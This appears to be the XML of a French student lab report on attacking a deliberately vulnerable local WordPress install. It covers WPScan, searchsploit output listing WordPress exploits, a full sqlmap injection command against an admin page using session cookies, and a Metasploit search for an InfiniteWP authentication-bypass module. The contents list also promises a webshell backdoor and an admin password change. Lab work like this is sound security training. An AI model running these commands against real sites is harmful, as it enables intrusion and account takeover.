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50975FA6" w:rsidR="008B6DA2" w:rsidRDefault="00FE17B3">
      <w:pPr>
        <w:pStyle w:val="En-ttedetabledesmatires"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5A3D399F" wp14:editId="35CE4246">
            <wp:extent cx="1295400" cy="749061"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="454888299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1314731" cy="7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25D3ED4" w14:textId="7F05753E" w:rsidR="003A4978" w:rsidRDefault="00615F8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6302" w:history="1">
            <w:r w:rsidR="003A4978" w:rsidRPr="009235CF">
              <w:rPr>
                <w:rStyle w:val="Lienhypertexte"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1. Découverte de l’outil Damn Vulnerable Wordpress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2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1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2E403929" w14:textId="3A86C2C7" w:rsidR="003A4978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3" w:history="1">
            <w:r w:rsidR="003A4978" w:rsidRPr="009235CF">
              <w:rPr>
                <w:rStyle w:val="Lienhypertexte"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2. Utilisation de l’outil WpScan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3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1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70DDB42E" w14:textId="7F450AF5" w:rsidR="003A4978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4" w:history="1">
            <w:r w:rsidR="003A4978" w:rsidRPr="009235CF">
              <w:rPr>
                <w:rStyle w:val="Lienhypertexte"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3. Utilisation de l’outil searchsploit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4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2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04564432" w14:textId="39B12EE5" w:rsidR="003A4978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5" w:history="1">
            <w:r w:rsidR="003A4978" w:rsidRPr="009235CF">
              <w:rPr>
                <w:rStyle w:val="Lienhypertexte"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4. Utilisation de l’outil sqlmap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5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3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7C82F2D3" w14:textId="671073D0" w:rsidR="003A4978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6" w:history="1">
            <w:r w:rsidR="003A4978" w:rsidRPr="009235CF">
              <w:rPr>
                <w:rStyle w:val="Lienhypertexte"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>5. Utilisation de l’outil Metasploit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6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3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46AA7F7D" w14:textId="616FB42A" w:rsidR="003A4978" w:rsidRDefault="0000000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7" w:history="1">
            <w:r w:rsidR="003A4978" w:rsidRPr="009235CF">
              <w:rPr>
                <w:rStyle w:val="Lienhypertexte"/>
                <w:noProof/>
              </w:rPr>
              <w:t>5.1. Installation et utilisation de l’outil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7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3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15E9BB8D" w14:textId="106E2F7A" w:rsidR="003A4978" w:rsidRDefault="0000000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8" w:history="1">
            <w:r w:rsidR="003A4978" w:rsidRPr="009235CF">
              <w:rPr>
                <w:rStyle w:val="Lienhypertexte"/>
                <w:noProof/>
              </w:rPr>
              <w:t>5.2. Mise en place d’un WebShell afin d’avoir une backdoor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8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5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42CCBB3B" w14:textId="5FFE2D1B" w:rsidR="003A4978" w:rsidRDefault="0000000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106309" w:history="1">
            <w:r w:rsidR="003A4978" w:rsidRPr="009235CF">
              <w:rPr>
                <w:rStyle w:val="Lienhypertexte"/>
                <w:noProof/>
              </w:rPr>
              <w:t>5.3. Changement du mot de passe du compte administrateur</w:t>
            </w:r>
            <w:r w:rsidR="003A4978">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="003A4978">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="003A4978">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc134106309 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="003A4978">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="003A4978">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00427BEB">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
            <w:r w:rsidR="003A4978">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3972C411" w14:textId="4337AA50" w:rsidR="00F20BBF" w:rsidRPr="00F96131" w:rsidRDefault="00615F8B" w:rsidP="00615F8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3BC25D" w14:textId="4AD1B1BF" w:rsidR="00F96131" w:rsidRPr="00F96131" w:rsidRDefault="00F96131" w:rsidP="00F96131">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F96131">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>Information : Ce TP est réalisé dans une VM Ubuntu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35F14C14" w14:textId="7ADF9A9F" w:rsidR="00117938" w:rsidRDefault="00615F8B" w:rsidP="00FD3304">
      <w:pPr>
        <w:pStyle w:val="Titre1"/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc134106302"/>
      <w:r>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r w:rsidR="009C4BFF">
        <w:t xml:space="preserve">Découverte de l’outil </w:t>
      </w:r>
      <w:r w:rsidR="00F96131">
        <w:t>Damn Vulnerable Wordpress</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="58993E1C" w14:textId="0F1804BC" w:rsidR="00F96131" w:rsidRDefault="00F96131" w:rsidP="00F96131">
      <w:r>
        <w:t xml:space="preserve">Installation : </w:t>
      </w:r>
      <w:hyperlink r:id="rId9" w:history="1">
        <w:r w:rsidRPr="00196611">
          <w:rPr>
            <w:rStyle w:val="Lienhypertexte"/>
          </w:rPr>
          <w:t>https://github.com/ChoiSG/vwp</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55D5B1A8" w14:textId="77777777" w:rsidR="00F96131" w:rsidRPr="00F96131" w:rsidRDefault="00F96131" w:rsidP="00F96131"/>
    <w:p w14:paraId="6985C6FA" w14:textId="77777777" w:rsidR="00F96131" w:rsidRDefault="00F96131" w:rsidP="00F96131">
      <w:pPr>
        <w:pStyle w:val="Titre1"/>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Toc134106303"/>
      <w:r>
        <w:t>2. Utilisation de l’outil WpScan</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w14:paraId="4E41C26C" w14:textId="4BCC86AB" w:rsidR="002B7C33" w:rsidRDefault="00F96131" w:rsidP="00F96131">
      <w:r>
        <w:t xml:space="preserve">Installation : </w:t>
      </w:r>
      <w:hyperlink r:id="rId10" w:history="1">
        <w:r w:rsidRPr="00196611">
          <w:rPr>
            <w:rStyle w:val="Lienhypertexte"/>
          </w:rPr>
          <w:t>https://kifarunix.com/install-wpscan-on-ubuntu-20-04/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="671E8577" w14:textId="409E0C12" w:rsidR="002B7C33" w:rsidRPr="002B7C33" w:rsidRDefault="002B7C33" w:rsidP="002B7C33">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B7C33">
        <w:rPr>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>WPScan est un logiciel gratuit qui vous aide à identifier les problèmes de sécurité sur votre site WordPress. Il fait plusieurs choses comme</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002B7C33">
        <w:rPr>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18F3083D" w14:textId="77777777" w:rsidR="002B7C33" w:rsidRPr="002B7C33" w:rsidRDefault="002B7C33" w:rsidP="002B7C33">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B7C33">
        <w:rPr>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>Vérifiez si le site utilise la version WP vulnérable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E8FD61D" w14:textId="77777777" w:rsidR="002B7C33" w:rsidRPr="002B7C33" w:rsidRDefault="002B7C33" w:rsidP="002B7C33">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B7C33">
        <w:rPr>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>Vérifiez si un thème et un plugin sont à jour ou connus pour être vulnérables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F15FB17" w14:textId="77777777" w:rsidR="002B7C33" w:rsidRPr="002B7C33" w:rsidRDefault="002B7C33" w:rsidP="002B7C33">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B7C33">
        <w:rPr>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>Vérifier timthumbs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="794E720D" w14:textId="77777777" w:rsidR="002B7C33" w:rsidRPr="002B7C33" w:rsidRDefault="002B7C33" w:rsidP="002B7C33">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B7C33">
        <w:rPr>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>Vérifier la sauvegarde de la configuration, les exportations de base de données</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="517A4E9D" w14:textId="77777777" w:rsidR="002B7C33" w:rsidRPr="002B7C33" w:rsidRDefault="002B7C33" w:rsidP="002B7C33">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B7C33">
        <w:rPr>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>Attaque par force brute</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C26BA78" w14:textId="22A15E26" w:rsidR="002B7C33" w:rsidRPr="002B7C33" w:rsidRDefault="002B7C33" w:rsidP="002B7C33">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>E</w:t>
      </w:r>
      <w:r w:rsidRPr="002B7C33">
        <w:rPr>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>t beaucoup plus…</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54CC7AD7" w14:textId="77777777" w:rsidR="002B7C33" w:rsidRPr="002B7C33" w:rsidRDefault="002B7C33" w:rsidP="002B7C33">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B7C33">
        <w:rPr>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>Il existe plusieurs façons d'utiliser WPScan.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43915D80" w14:textId="77777777" w:rsidR="002B7C33" w:rsidRPr="002B7C33" w:rsidRDefault="002B7C33" w:rsidP="002B7C33">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B7C33">
        <w:rPr>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>En installant sur des serveurs Linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ABCD7B5" w14:textId="77777777" w:rsidR="002B7C33" w:rsidRPr="002B7C33" w:rsidRDefault="002B7C33" w:rsidP="002B7C33">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B7C33">
        <w:rPr>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Utilisation de Docker</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79AC1D48" w14:textId="77777777" w:rsidR="002B7C33" w:rsidRPr="002B7C33" w:rsidRDefault="002B7C33" w:rsidP="002B7C33">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B7C33">
        <w:rPr>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>Utilisation d'une distribution Linux préinstallée comme Kali Linux, BackBox, Pentoo, BlackArch, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DDEC0BC" w14:textId="17DE09CA" w:rsidR="00F96131" w:rsidRPr="00F96131" w:rsidRDefault="002B7C33" w:rsidP="00F96131">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B7C33">
        <w:rPr>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>Version en ligne</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="518D7B33" w14:textId="4D012225" w:rsidR="00F96131" w:rsidRDefault="00F96131" w:rsidP="00F96131">
      <w:pPr>
        <w:pStyle w:val="Titre1"/>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Toc134106304"/>
      <w:r>
        <w:t>3. Utilisation de l’outil searchsploit</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p w14:paraId="6C077B4E" w14:textId="4DFFE513" w:rsidR="00F96131" w:rsidRDefault="00F96131" w:rsidP="00F96131">
      <w:r>
        <w:t>Installation :</w:t>
      </w:r>
      <w:r w:rsidRPr="00F96131">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId11" w:history="1">
        <w:r w:rsidRPr="00196611">
          <w:rPr>
            <w:rStyle w:val="Lienhypertexte"/>
          </w:rPr>
          <w:t>https://snapcraft.io/install/searchsploit/ubuntu</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="194A1259" w14:textId="23C0486E" w:rsidR="0040471B" w:rsidRDefault="0040471B" w:rsidP="00F96131">
      <w:r>
        <w:t>Searchsploit permet de lister toutes les failles connues d’un environnement donné (ici Wordpress avec sa version)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C210A8F" w14:textId="6E6D0C98" w:rsidR="00726540" w:rsidRPr="0040471B" w:rsidRDefault="00726540" w:rsidP="00726540">
      <w:pPr>
        <w:pStyle w:val="Terminal"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0040471B">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>root@opendaylight:/home/ubuntu/sqlmap-dev# searchsploit "WordPress 4.8.3"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A9EE645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--------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CF4A222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 xml:space="preserve"> Exploit Title                                                                                                                                                       |  Path</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FFCCD9D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--------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6068E304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NEX-Forms WordPress plugin &lt; 7.9.7 - Authenticated SQLi                                                                                                              | php/webapps/51042.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32D9E845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WordPress Core &lt; 4.9.6 - (Authenticated) Arbitrary File Deletion                                                                                                     | php/webapps/44949.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CB07468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WordPress Core &lt; 5.2.3 - Viewing Unauthenticated/Password/Private Posts                                                                                              | multiple/webapps/47690.md</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="486EB5B6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WordPress Core &lt; 5.3.x - 'xmlrpc.php' Denial of Service                                                                                                              | php/dos/47800.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A3DF1BD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WordPress Plugin Database Backup &lt; 5.2 - Remote Code Execution (Metasploit)                                                                                          | php/remote/47187.rb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="156FCBB6" w14:textId="77777777" w:rsidR="00726540" w:rsidRP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WordPress Plugin DZS Videogallery &lt; 8.60 - Multiple Vulnerabilities                                                                                                  | php/webapps/39553.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="163A0939" w14:textId="77777777" w:rsidR="00726540" w:rsidRDefault="00726540" w:rsidP="00726540">
      <w:pPr>
        <w:pStyle w:val="Terminal"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00726540">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>WordPress Theme Enfold 4.8.3 - Reflected Cross-Site Scripting (XSS)                                                                                                  | php/webapps/50427.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B318EBD" w14:textId="1717D443" w:rsidR="00182701" w:rsidRPr="00EC596F" w:rsidRDefault="00182701" w:rsidP="00726540">
      <w:pPr>
        <w:pStyle w:val="Terminal"/>
      </w:pPr>
      <w:r w:rsidRPr="00EC596F">
        <w:t>... ... ... ... ...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B808ECC" w14:textId="77777777" w:rsidR="00726540" w:rsidRDefault="00726540" w:rsidP="00726540">
      <w:pPr>
        <w:pStyle w:val="Terminal"/>
      </w:pPr>
      <w:r>
        <w:t>--------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F4EA3C1" w14:textId="1DF2FFB4" w:rsidR="00F96131" w:rsidRDefault="00726540" w:rsidP="00726540">
      <w:pPr>
        <w:pStyle w:val="Terminal"/>
      </w:pPr>
      <w:r>
        <w:t>Shellcodes: No Results</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61E5B878" w14:textId="77777777" w:rsidR="00182701" w:rsidRDefault="00182701" w:rsidP="00182701"/>
    <w:p w14:paraId="31581EAE" w14:textId="77777777" w:rsidR="00182701" w:rsidRPr="00F96131" w:rsidRDefault="00182701" w:rsidP="00182701"/>
    <w:p w14:paraId="5A3C4B40" w14:textId="41113A94" w:rsidR="00F96131" w:rsidRDefault="00F96131" w:rsidP="00F96131">
      <w:pPr>
        <w:pStyle w:val="Titre1"/>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc134106305"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>4. Utilisation de l’outil sqlmap</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w14:paraId="281E0240" w14:textId="75F99789" w:rsidR="005A282D" w:rsidRPr="00EC596F" w:rsidRDefault="00B03B0C" w:rsidP="005A282D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC596F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Installation : </w:t>
      </w:r>
      <w:hyperlink r:id="rId12" w:history="1">
        <w:r w:rsidRPr="00EC596F">
          <w:rPr>
            <w:rStyle w:val="Lienhypertexte"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>https://sqlmap.org/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00EC596F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E0AE9F6" w14:textId="69CF33FC" w:rsidR="00600420" w:rsidRDefault="00600420" w:rsidP="00600420">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00600420">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20DE1CBC" w14:textId="77777777" w:rsidR="00AD44A5" w:rsidRDefault="00AD44A5" w:rsidP="00600420">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C3B0268" w14:textId="7AA810DF" w:rsidR="00AD44A5" w:rsidRDefault="00AD44A5" w:rsidP="00600420">
      <w:r w:rsidRPr="00AD44A5">
        <w:t>Exploitation d’une faille d’injection SQL d</w:t>
      </w:r>
      <w:r>
        <w:t>écouverte avec l’outil searchsploit</w:t>
      </w:r>
      <w:r w:rsidR="004F4A5D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004F4A5D" w:rsidRPr="00CA7F06">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>(le plugin a besoin d’être en action sur une page ouverte sinon cela ne fonctionnera pas)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA7F06">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68E89507" w14:textId="09F22FBE" w:rsidR="00AD44A5" w:rsidRDefault="00AD44A5" w:rsidP="00AD44A5">
      <w:pPr>
        <w:pStyle w:val="Terminal"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD44A5">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>root@opendaylight:/home/ubuntu/sqlmap-dev# python3 sqlmap.py -u 'http://localhost:8081/wp-admin/admin.php?page=itsec-logs&amp;filter=malware&amp;orderby=remote_ip*&amp;order=asc&amp;paged=0' --cookie "wordpress_b...; wordpress_logged_in_bbf...;" --string "WordPress" --dbms=MySQL --level 5 --risk 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FD145DD" w14:textId="48DE8460" w:rsidR="00E706FB" w:rsidRPr="00EC596F" w:rsidRDefault="00E706FB" w:rsidP="00E706FB">
      <w:pPr>
        <w:pStyle w:val="Titre1"/>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc134106306"/>
      <w:r w:rsidRPr="00EC596F">
        <w:t>5. Utilisation de l’outil Metasploit</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w14:paraId="1A255D33" w14:textId="0AA5B5EA" w:rsidR="00D54590" w:rsidRPr="00D54590" w:rsidRDefault="00D54590" w:rsidP="00D54590">
      <w:pPr>
        <w:pStyle w:val="Titre2"/>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_Toc134106307"/>
      <w:r w:rsidRPr="00D54590">
        <w:t>5.1. Installation et utili</w:t>
      </w:r>
      <w:r w:rsidR="00EB04C5">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="00D54590">
        <w:t>ation de l</w:t>
      </w:r>
      <w:r>
        <w:t>’outil</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p w14:paraId="7A43E0F5" w14:textId="059BE629" w:rsidR="00E706FB" w:rsidRDefault="00E23F8D" w:rsidP="00E706FB">
      <w:r w:rsidRPr="00E23F8D">
        <w:t xml:space="preserve">Installation : </w:t>
      </w:r>
      <w:hyperlink r:id="rId13" w:history="1">
        <w:r w:rsidRPr="00196611">
          <w:rPr>
            <w:rStyle w:val="Lienhypertexte"/>
          </w:rPr>
          <w:t>https://docs.metasploit.com/docs/using-metasploit/getting-started/nightly-installers.html</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EDCAACA" w14:textId="77777777" w:rsidR="00E23F8D" w:rsidRDefault="00E23F8D" w:rsidP="00E706FB">
      <w:r>
        <w:t xml:space="preserve">Ouverture de la console msf : </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="190242EA" w14:textId="0387E158" w:rsidR="00E23F8D" w:rsidRDefault="00E23F8D" w:rsidP="00E23F8D">
      <w:pPr>
        <w:pStyle w:val="Terminal"/>
      </w:pPr>
      <w:r w:rsidRPr="00E23F8D">
        <w:t>/opt/metasploit-framework/bin/msfconsole</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C34FAF9" w14:textId="1663545A" w:rsidR="00E23F8D" w:rsidRDefault="00543EDB" w:rsidP="00E23F8D">
      <w:r>
        <w:t>Exemple de commande pour exploiter une faille de notre Wordpress :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48D4FF92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msf6 &gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="00671ECE">
        <w:rPr>
          <w:highlight w:val="red"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>search name:infinite</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E5D5710" w14:textId="77777777" w:rsidR="00543EDB" w:rsidRPr="00543EDB" w:rsidRDefault="00543EDB" w:rsidP="00543EDB">
      <w:pPr>
        <w:pStyle w:val="Terminal"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4DE1BE2E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>Matching Modules</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FAA568A" w14:textId="3DB1F06C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>================</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74C6EBCF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   #  Name                                                        Disclosure Date  Rank    Check  Description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E5151D3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   -  ----                                                        ---------------  ----    -----  -----------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60BCB53C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   0  auxiliary/dos/windows/smb/ms10_006_negotiate_response_loop                   normal  No     Microsoft Windows 7 / Server 2008 R2 SMB Client Infinite Loop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4281B7BB" w14:textId="77777777" w:rsid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   </w:t>
      </w:r>
      <w:r w:rsidRPr="004D7424">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">1  </w:t>
      </w:r>
      <w:r w:rsidRPr="004D7424">
        <w:rPr>
          <w:highlight w:val="blue"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>exploit/unix/webapp/wp_infinitewp_auth_bypass</w:t>
      </w:r>
      <w:r w:rsidRPr="004D7424">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">               2020-01-14       manual  Yes    WordPress InfiniteWP Client Authentication Bypass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A6643D6" w14:textId="77777777" w:rsidR="002A3E26" w:rsidRPr="00EC596F" w:rsidRDefault="002A3E26" w:rsidP="002A3E26">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
